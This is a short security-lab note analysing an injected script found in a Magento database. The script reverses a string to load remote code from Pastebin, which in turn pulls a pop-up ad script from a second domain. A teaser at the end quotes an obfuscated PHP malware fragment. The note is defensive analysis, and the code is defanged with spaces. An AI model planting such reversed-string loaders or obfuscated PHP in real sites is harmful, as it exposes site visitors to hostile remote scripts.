Reversed Pastebin Injection in Magento DB

Labs Note

We worked on an infected Magento site that had unwanted pop-up ads when you visited it. The culprit was this injected script (spaces added intentionally)

<s c r i p t>document .write('>tpircs/<>"YzSBPWt9=i?php .war/moc . nibetsap / / :sptth"=crs tpircs<'.split("").reverse().join(""))</s c r i p t>

This code uses the reverse() JavaScript function to dynamically inject a remote script directly from – https: / / pastebin . com/raw .php?i = 9tWPBSzY. That’s not the first time we see hackers leveraging the Pastebin service

This time the raw pastebin code uses the same reverse() trick to inject the final remote script from hxxp: / / lachinampa . com . mx/stat/. That script has the actual pop-up code that uses the blablatrafic .com as the intermediary between other ad providers.

In some cases, the same pop-up code injection was noticed on WordPress sites. So this isn’t limited to Magento and you should check your files and database even if you are using a different CMS. Or have us scan your site for you.

You May Also Like

PHP str_replace to hide malware

We found another interesting piece of PHP-based malware on a client site a few days ago: $exg=”JGMnd9J2NvdW50JzskYTnd0kX0ndNPndT0tJRTtpZihyZXNldCgkndYSk9PSdtandCcgJndiYgJGMondJGEpPjM”; $iyo=”GxhndY2UndoYXJyYndXkoJy9bndXlndx3PVxzXS8nLndCcvXHMvndJyksIGFyndcmF5KCcnLCcrJyk”; $ts = str_replace(“b”,””,”bsbtr_brbepblabcbe”); $fy=”sIGpndvaW4oYXJyYXlfc2xpY2UoJndGEndsJGMoJGEpLTndMpKndSkpKTtlYnd2hvICc8LycuJGsnduJz4nO30=”; $sjb=”peyRrPSndd1nddGU0bndSc7ZWNobyAnPCcnduJGsundJz4nO2ndV2YWwoYmFzZndTY0X2RlY29kZShwcmVnX3Jlc”; $dzy =…
Read More